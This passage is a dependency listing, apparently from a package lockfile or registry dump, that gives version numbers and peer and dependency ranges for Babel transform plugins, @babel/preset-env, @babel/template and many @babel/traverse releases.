@babel/helper-compilation-targets@^7.27.2 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-destructuring@^7.28.0 @babel/plugin-transform-parameters@^7.27.7 @babel/traverse@^7.28.4 @babel/plugin-transform-object-super 7.5.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-replace-supers@^7.5.5 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-replace-supers@^7.27.1 @babel/plugin-transform-optional-catch-binding 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-optional-chaining 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-skip-transparent-expression-wrappers@^7.27.1 @babel/plugin-transform-parameters 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-call-delegate@^7.4.4 @babel/helper-get-function-arity@^7.0.0 @babel/helper-plugin-utils@^7.0.0 7.27.7 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-private-methods 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-create-class-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-private-property-in-object 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-annotate-as-pure@^7.27.1 @babel/helper-create-class-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-property-literals 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-regenerator 7.4.5 Scope peer|@babel/core@^7.0.0-0 regenerator-transform@^0.14.0 7.28.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-regexp-modifiers 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-reserved-words 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-shorthand-properties 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-spread 7.2.2 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-skip-transparent-expression-wrappers@^7.27.1 @babel/plugin-transform-sticky-regex 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-regex@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-template-literals 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-annotate-as-pure@^7.0.0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-typeof-symbol 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-unicode-escapes 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-unicode-property-regex 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-unicode-regex 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-regex@^7.4.4 regexpu-core@^4.5.4 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-unicode-sets-regex 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/preset-env 7.6.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-imports@^7.0.0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-proposal-async-generator-functions@^7.2.0 @babel/plugin-proposal-dynamic-import@^7.5.0 @babel/plugin-proposal-json-strings@^7.2.0 @babel/plugin-proposal-object-rest-spread@^7.5.5 @babel/plugin-proposal-optional-catch-binding@^7.2.0 @babel/plugin-proposal-unicode-property-regex@^7.4.4 @babel/plugin-syntax-async-generators@^7.2.0 @babel/plugin-syntax-dynamic-import@^7.2.0 @babel/plugin-syntax-json-strings@^7.2.0 @babel/plugin-syntax-object-rest-spread@^7.2.0 @babel/plugin-syntax-optional-catch-binding@^7.2.0 @babel/plugin-transform-arrow-functions@^7.2.0 @babel/plugin-transform-async-to-generator@^7.5.0 @babel/plugin-transform-block-scoped-functions@^7.2.0 @babel/plugin-transform-block-scoping@^7.6.0 @babel/plugin-transform-classes@^7.5.5 @babel/plugin-transform-computed-properties@^7.2.0 @babel/plugin-transform-destructuring@^7.6.0 @babel/plugin-transform-dotall-regex@^7.4.4 @babel/plugin-transform-duplicate-keys@^7.5.0 @babel/plugin-transform-exponentiation-operator@^7.2.0 @babel/plugin-transform-for-of@^7.4.4 @babel/plugin-transform-function-name@^7.4.4 @babel/plugin-transform-literals@^7.2.0 @babel/plugin-transform-member-expression-literals@^7.2.0 @babel/plugin-transform-modules-amd@^7.5.0 @babel/plugin-transform-modules-commonjs@^7.6.0 @babel/plugin-transform-modules-systemjs@^7.5.0 @babel/plugin-transform-modules-umd@^7.2.0 @babel/plugin-transform-named-capturing-groups-regex@^7.6.0 @babel/plugin-transform-new-target@^7.4.4 @babel/plugin-transform-object-super@^7.5.5 @babel/plugin-transform-parameters@^7.4.4 @babel/plugin-transform-property-literals@^7.2.0 @babel/plugin-transform-regenerator@^7.4.5 @babel/plugin-transform-reserved-words@^7.2.0 @babel/plugin-transform-shorthand-properties@^7.2.0 @babel/plugin-transform-spread@^7.2.0 @babel/plugin-transform-sticky-regex@^7.2.0 @babel/plugin-transform-template-literals@^7.4.4 @babel/plugin-transform-typeof-symbol@^7.2.0 @babel/plugin-transform-unicode-regex@^7.4.4 @babel/types@^7.6.0 browserslist@^4.6.0 core-js-compat@^3.1.1 invariant@^2.2.2 js-levenshtein@^1.1.3 semver@^5.5.0 7.28.5 @babel/compat-data@^7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-compilation-targets@^7.27.2 @babel/helper-plugin-utils@^7.27.1 @babel/helper-validator-option@^7.27.1 @babel/plugin-bugfix-firefox-class-in-computed-class-key@^7.28.5 @babel/plugin-bugfix-safari-class-field-initializer-scope@^7.27.1 @babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression@^7.27.1 @babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining@^7.27.1 @babel/plugin-bugfix-v8-static-class-fields-redefine-readonly@^7.28.3 @babel/plugin-proposal-private-property-in-object@7.21.0-placeholder-for-preset-env.2 @babel/plugin-syntax-import-assertions@^7.27.1 @babel/plugin-syntax-import-attributes@^7.27.1 @babel/plugin-syntax-unicode-sets-regex@^7.18.6 @babel/plugin-transform-arrow-functions@^7.27.1 @babel/plugin-transform-async-generator-functions@^7.28.0 @babel/plugin-transform-async-to-generator@^7.27.1 @babel/plugin-transform-block-scoped-functions@^7.27.1 @babel/plugin-transform-block-scoping@^7.28.5 @babel/plugin-transform-class-properties@^7.27.1 @babel/plugin-transform-class-static-block@^7.28.3 @babel/plugin-transform-classes@^7.28.4 @babel/plugin-transform-computed-properties@^7.27.1 @babel/plugin-transform-destructuring@^7.28.5 @babel/plugin-transform-dotall-regex@^7.27.1 @babel/plugin-transform-duplicate-keys@^7.27.1 @babel/plugin-transform-duplicate-named-capturing-groups-regex@^7.27.1 @babel/plugin-transform-dynamic-import@^7.27.1 @babel/plugin-transform-explicit-resource-management@^7.28.0 @babel/plugin-transform-exponentiation-operator@^7.28.5 @babel/plugin-transform-export-namespace-from@^7.27.1 @babel/plugin-transform-for-of@^7.27.1 @babel/plugin-transform-function-name@^7.27.1 @babel/plugin-transform-json-strings@^7.27.1 @babel/plugin-transform-literals@^7.27.1 @babel/plugin-transform-logical-assignment-operators@^7.28.5 @babel/plugin-transform-member-expression-literals@^7.27.1 @babel/plugin-transform-modules-amd@^7.27.1 @babel/plugin-transform-modules-commonjs@^7.27.1 @babel/plugin-transform-modules-systemjs@^7.28.5 @babel/plugin-transform-modules-umd@^7.27.1 @babel/plugin-transform-named-capturing-groups-regex@^7.27.1 @babel/plugin-transform-new-target@^7.27.1 @babel/plugin-transform-nullish-coalescing-operator@^7.27.1 @babel/plugin-transform-numeric-separator@^7.27.1 @babel/plugin-transform-object-rest-spread@^7.28.4 @babel/plugin-transform-object-super@^7.27.1 @babel/plugin-transform-optional-catch-binding@^7.27.1 @babel/plugin-transform-optional-chaining@^7.28.5 @babel/plugin-transform-parameters@^7.27.7 @babel/plugin-transform-private-methods@^7.27.1 @babel/plugin-transform-private-property-in-object@^7.27.1 @babel/plugin-transform-property-literals@^7.27.1 @babel/plugin-transform-regenerator@^7.28.4 @babel/plugin-transform-regexp-modifiers@^7.27.1 @babel/plugin-transform-reserved-words@^7.27.1 @babel/plugin-transform-shorthand-properties@^7.27.1 @babel/plugin-transform-spread@^7.27.1 @babel/plugin-transform-sticky-regex@^7.27.1 @babel/plugin-transform-template-literals@^7.27.1 @babel/plugin-transform-typeof-symbol@^7.27.1 @babel/plugin-transform-unicode-escapes@^7.27.1 @babel/plugin-transform-unicode-property-regex@^7.27.1 @babel/plugin-transform-unicode-regex@^7.27.1 @babel/plugin-transform-unicode-sets-regex@^7.27.1 @babel/preset-modules@0.1.6-no-external-plugins babel-plugin-polyfill-corejs2@^0.4.14 babel-plugin-polyfill-corejs3@^0.13.0 babel-plugin-polyfill-regenerator@^0.6.5 core-js-compat@^3.43.0 semver@^6.3.1 @babel/preset-modules 0.1.6-no-external-plugins Scope peer|@babel/core@^7.0.0-0 || ^8.0.0-0 <8.0.0 @babel/helper-plugin-utils@^7.0.0 @babel/types@^7.4.4 esutils@^2.0.2 @babel/template 7.1.2 @babel/code-frame@^7.0.0 @babel/parser@^7.1.2 @babel/types@^7.1.2 7.6.0 @babel/code-frame@^7.0.0 @babel/parser@^7.6.0 @babel/types@^7.6.0 7.27.2 @babel/code-frame@^7.27.1 @babel/parser@^7.27.2 @babel/types@^7.27.1 @babel/traverse 7.6.0 @babel/code-frame@^7.5.5 @babel/generator@^7.6.0 @babel/helper-function-name@^7.1.0 @babel/helper-split-export-declaration@^7.4.4 @babel/parser@^7.6.0 @babel/types@^7.6.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.6.2 @babel/code-frame@^7.5.5 @babel/generator@^7.6.2 @babel/helper-function-name@^7.1.0 @babel/helper-split-export-declaration@^7.4.4 @babel/parser@^7.6.2 @babel/types@^7.6.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.6.3 @babel/code-frame@^7.5.5 @babel/generator@^7.6.3 @babel/helper-function-name@^7.1.0 @babel/helper-split-export-declaration@^7.4.4 @babel/parser@^7.6.3 @babel/types@^7.6.3 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.7.0 @babel/code-frame@^7.5.5 @babel/generator@^7.7.0 @babel/helper-function-name@^7.7.0 @babel/helper-split-export-declaration@^7.7.0 @babel/parser@^7.7.0 @babel/types@^7.7.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.7.2 @babel/code-frame@^7.5.5 @babel/generator@^7.7.2 @babel/helper-function-name@^7.7.0 @babel/helper-split-export-declaration@^7.7.0 @babel/parser@^7.7.2 @babel/types@^7.7.2 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.7.4 @babel/code-frame@^7.5.5 @babel/generator@^7.7.4 @babel/helper-function-name@^7.7.4 @babel/helper-split-export-declaration@^7.7.4 @babel/parser@^7.7.4 @babel/types@^7.7.4 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.8.0 @babel/code-frame@^7.8.0 @babel/generator@^7.8.0 @babel/helper-function-name@^7.8.0 @babel/helper-split-export-declaration@^7.8.0 @babel/parser@^7.8.0 @babel/types@^7.8.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.8.3 @babel/code-frame@^7.8.3 @babel/generator@^7.8.3 @babel/helper-function-name@^7.8.3 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.8.3 @babel/types@^7.8.3 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.8.4 @babel/code-frame@^7.8.3 @babel/generator@^7.8.4 @babel/helper-function-name@^7.8.3 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.8.4 @babel/types@^7.8.3 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.8.6 @babel/code-frame@^7.8.3 @babel/generator@^7.8.6 @babel/helper-function-name@^7.8.3 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.8.6 @babel/types@^7.8.6 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.9.0 @babel/code-frame@^7.8.3 @babel/generator@^7.9.0 @babel/helper-function-name@^7.8.3 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.9.0 @babel/types@^7.9.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.9.5 @babel/code-frame@^7.8.3 @babel/generator@^7.9.5 @babel/helper-function-name@^7.9.5 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.9.0 @babel/types@^7.9.5 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.9.6 @babel/code-frame@^7.8.3 @babel/generator@^7.9.6 @babel/helper-function-name@^7.9.5 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.9.6 @babel/types@^7.9.6 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.10.0 @babel/code-frame@^7.8.3 @babel/generator@^7.10.0 @babel/helper-function-name@^7.9.5 @babel/helper-split-export-declaration@^7.8.3 @babel/parser@^7.10.0 @babel/types@^7.10.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.10.1 @babel/code-frame@^7.10.1 @babel/generator@^7.10.1 @babel/helper-function-name@^7.10.1 @babel/helper-split-export-declaration@^7.10.1 @babel/parser@^7.10.1 @babel/types@^7.10.1 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.10.3 @babel/code-frame@^7.10.3 @babel/generator@^7.10.3 @babel/helper-function-name@^7.10.3 @babel/helper-split-export-declaration@^7.10.1 @babel/parser@^7.10.3 @babel/types@^7.10.3 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.10.4 @babel/code-frame@^7.10.4 @babel/generator@^7.10.4 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.10.4 @babel/parser@^7.10.4 @babel/types@^7.10.4 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.13 7.10.5 @babel/code-frame@^7.10.4 @babel/generator@^7.10.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.10.4 @babel/parser@^7.10.5 @babel/types@^7.10.5 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.11.0 @babel/code-frame@^7.10.4 @babel/generator@^7.11.0 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.11.0 @babel/types@^7.11.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.11.5 @babel/code-frame@^7.10.4 @babel/generator@^7.11.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.11.5 @babel/types@^7.11.5 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.0 @babel/code-frame@^7.10.4 @babel/generator@^7.12.0 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.0 @babel/types@^7.12.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.1 @babel/code-frame@^7.10.4 @babel/generator@^7.12.1 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.1 @babel/types@^7.12.1 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.5 @babel/code-frame@^7.10.4 @babel/generator@^7.12.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.5 @babel/types@^7.12.5 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.7 @babel/code-frame@^7.10.4 @babel/generator@^7.12.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.7 @babel/types@^7.12.7 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.8 @babel/code-frame@^7.10.4 @babel/generator@^7.12.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.7 @babel/types@^7.12.7 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.9 @babel/code-frame@^7.10.4 @babel/generator@^7.12.5 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.7 @babel/types@^7.12.7 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.10 @babel/code-frame@^7.10.4 @babel/generator@^7.12.10 @babel/helper-function-name@^7.10.4 @babel/helper-split-export-declaration@^7.11.0 @babel/parser@^7.12.10 @babel/types@^7.12.10 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.12 @babel/code-frame@^7.12.11 @babel/generator@^7.12.11 @babel/helper-function-name@^7.12.11 @babel/helper-split-export-declaration@^7.12.11 @babel/parser@^7.12.11 @babel/types@^7.12.12 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.13 @babel/code-frame@^7.12.13 @babel/generator@^7.12.13 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.12.13 @babel/types@^7.12.13 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.12.17 @babel/code-frame@^7.12.13 @babel/generator@^7.12.17 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.12.17 @babel/types@^7.12.17 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.13.0 @babel/code-frame@^7.12.13 @babel/generator@^7.13.0 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.13.0 @babel/types@^7.13.0 debug@^4.1.0 globals@^11.1.0 lodash@^4.17.19 7.13.13 @babel/code-frame@^7.12.13 @babel/generator@^7.13.9 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.13.13 @babel/types@^7.13.13 debug@^4.1.0 globals@^11.1.0 7.13.15 @babel/code-frame@^7.12.13 @babel/generator@^7.13.9 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.13.15 @babel/types@^7.13.14 debug@^4.1.0 globals@^11.1.0 7.13.17 @babel/code-frame@^7.12.13 @babel/generator@^7.13.16 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.13.16 @babel/types@^7.13.17 debug@^4.1.0 globals@^11.1.0 7.14.0 @babel/code-frame@^7.12.13 @babel/generator@^7.14.0 @babel/helper-function-name@^7.12.13 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.14.0 @babel/types@^7.14.0 debug@^4.1.0 globals@^11.1.0 7.14.2 @babel/code-frame@^7.12.13 @babel/generator@^7.14.2 @babel/helper-function-name@^7.14.2 @babel/helper-split-export-declaration@^7.12.13 @babel/parser@^7.14.2 @babel/types@^7.14.2 debug@^4.1.0 globals@^11.1.0 7.14.5 @babel/code-frame@^7.14.5 @babel/generator@^7.14.5 @babel/helper-function-name@^7.14.5 @babel/helper-hoist-variables@^7.14.5 @babel/helper-split-export-declaration@^7.14.5 @babel/parser@^7.14.5 @babel/types@^7.14.5 debug@^4.1.0 globals@^11.1.0 7.14.7 @babel/code-frame@^7.14.5 @babel/generator@^7.14.5 @babel/helper-function-name@^7.14.5 @babel/helper-hoist-variables@^7.14.5 @babel/helper-split-export-declaration@^7.14.5 @babel/parser@^7.14.7 @babel/types@^7.14.5 debug@^4.1.0 globals@^11.1.0 7.14.8 @babel/code-frame@^7.14.5 @babel/generator@^7.14.8 @babel/helper-function-name@^7.14.5 @babel/helper-hoist-variables@^7.14.5 @babel/helper-split-export-declaration@^7.14.5 @babel/parser@^7.14.8 @babel/types@^7.14.8 debug@^4.1.0 globals@^11.1.0 7.14.9 @babel/code-frame@^7.14.5 @babel/generator@^7.14.9 @babel/helper-function-name@^7.14.5 @babel/helper-hoist-variables@^7.14.5 @babel/helper-split-export-declaration@^7.14.5 @babel/parser@^7.14.9 @babel/types@^7.14.9 debug@^4.1.0 globals@^11.1.0 7.15.0 @babel/code-frame@^7.14.5 @babel/generator@^7.15.0 @babel/helper-function-name@^7.14.5 @babel/helper-hoist-variables@^7.14.5 @babel/helper-split-export-declaration@^7.14.5 @babel/parser@^7.15.0 @babel/types@^7.15.0 debug@^4.1.0 globals@^11.1.0 7.15.4 @babel/code-frame@^7.14.5 @babel/generator@^7.15.4 @babel/helper-function-name@^7.15.4 @babel/helper-hoist-variables@^7.15.4 @babel/helper-split-export-declaration@^7.15.4 @babel/parser@^7.15.4 @babel/types@^7.15.4 debug@^4.1.0 globals@^11.1.0 7.16.0 @babel/code-frame@^7.16.0 @babel/generator@^7.16.0 @babel/helper-function-name@^7.16.0 @babel/helper-hoist-variables@^7.16.0 @babel/helper-split-export-declaration@^7.16.0 @babel/parser@^7.16.0 @babel/types@^7.16.0 debug@^4.1.0 globals@^11.1.0 7.16.3 @babel/code-frame@^7.16.0 @babel/generator@^7.16.0 @babel/helper-function-name@^7.16.0 @babel/helper-hoist-variables@^7.16.0 @babel/helper-split-export-declaration@^7.16.0 @babel/parser@^7.16.3 @babel/types@^7.16.0 debug@^4.1.0 globals@^11.1.0 7.16.5 @babel/code-frame@^7.16.0 @babel/generator@^7.16.5 @babel/helper-environment-visitor@^7.16.5 @babel/helper-function-name@^7.16.0 @babel/helper-hoist-variables@^7.16.0 @babel/helper-split-export-declaration@^7.16.0 @babel/parser@^7.16.5 @babel/types@^7.16.0 debug@^4.1.0 globals@^11.1.0 7.16.7 @babel/code-frame@^7.16.7 @babel/generator@^7.16.7 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.16.7 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.16.7 @babel/types@^7.16.7 debug@^4.1.0 globals@^11.1.0 7.16.8 @babel/code-frame@^7.16.7 @babel/generator@^7.16.8 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.16.7 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.16.8 @babel/types@^7.16.8 debug@^4.1.0 globals@^11.1.0 7.16.10 @babel/code-frame@^7.16.7 @babel/generator@^7.16.8 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.16.7 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.16.10 @babel/types@^7.16.8 debug@^4.1.0 globals@^11.1.0 7.17.0 @babel/code-frame@^7.16.7 @babel/generator@^7.17.0 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.16.7 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.17.0 @babel/types@^7.17.0 debug@^4.1.0 globals@^11.1.0 7.17.3 @babel/code-frame@^7.16.7 @babel/generator@^7.17.3 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.16.7 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.17.3 @babel/types@^7.17.0 debug@^4.1.0 globals@^11.1.0 7.17.9 @babel/code-frame@^7.16.7 @babel/generator@^7.17.9 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.17.9 @babel/types@^7.17.0 debug@^4.1.0 globals@^11.1.0 7.17.10 @babel/code-frame@^7.16.7 @babel/generator@^7.17.10 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.17.10 @babel/types@^7.17.10 debug@^4.1.0 globals@^11.1.0 7.17.12 @babel/code-frame@^7.16.7 @babel/generator@^7.17.12 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.17.12 @babel/types@^7.17.12 debug@^4.1.0 globals@^11.1.0 7.18.0 @babel/code-frame@^7.16.7 @babel/generator@^7.18.0 @babel/helper-environment-visitor@^7.16.7 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.18.0 @babel/types@^7.18.0 debug@^4.1.0 globals@^11.1.0 7.18.2 @babel/code-frame@^7.16.7 @babel/generator@^7.18.2 @babel/helper-environment-visitor@^7.18.2 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.18.0 @babel/types@^7.18.2 debug@^4.1.0 globals@^11.1.0 7.18.5 @babel/code-frame@^7.16.7 @babel/generator@^7.18.2 @babel/helper-environment-visitor@^7.18.2 @babel/helper-function-name@^7.17.9 @babel/helper-hoist-variables@^7.16.7 @babel/helper-split-export-declaration@^7.16.7 @babel/parser@^7.18.5 @babel/types@^7.18.4 debug@^4.1.0 globals@^11.1.0 7.18.6 @babel/code-frame@^7.18.6 @babel/generator@^7.18.6 @babel/helper-environment-visitor@^7.18.6 @babel/helper-function-name@^7.18.6 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.6 @babel/types@^7.18.6 debug@^4.1.0 globals@^11.1.0 7.18.8 @babel/code-frame@^7.18.6 @babel/generator@^7.18.7 @babel/helper-environment-visitor@^7.18.6 @babel/helper-function-name@^7.18.6 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.8 @babel/types@^7.18.8 debug@^4.1.0 globals@^11.1.0 7.18.9 @babel/code-frame@^7.18.6 @babel/generator@^7.18.9 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.18.9 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.9 @babel/types@^7.18.9 debug@^4.1.0 globals@^11.1.0 7.18.10 @babel/code-frame@^7.18.6 @babel/generator@^7.18.10 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.18.9 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.10 @babel/types@^7.18.10 debug@^4.1.0 globals@^11.1.0 7.18.11 @babel/code-frame@^7.18.6 @babel/generator@^7.18.10 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.18.9 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.11 @babel/types@^7.18.10 debug@^4.1.0 globals@^11.1.0 7.18.13 @babel/code-frame@^7.18.6 @babel/generator@^7.18.13 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.18.9 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.18.13 @babel/types@^7.18.13 debug@^4.1.0 globals@^11.1.0 7.19.0 @babel/code-frame@^7.18.6 @babel/generator@^7.19.0 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.19.0 @babel/types@^7.19.0 debug@^4.1.0 globals@^11.1.0 7.19.1 @babel/code-frame@^7.18.6 @babel/generator@^7.19.0 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.19.1 @babel/types@^7.19.0 debug@^4.1.0 globals@^11.1.0 7.19.3 @babel/code-frame@^7.18.6 @babel/generator@^7.19.3 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.19.3 @babel/types@^7.19.3 debug@^4.1.0 globals@^11.1.0 7.19.4 @babel/code-frame@^7.18.6 @babel/generator@^7.19.4 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 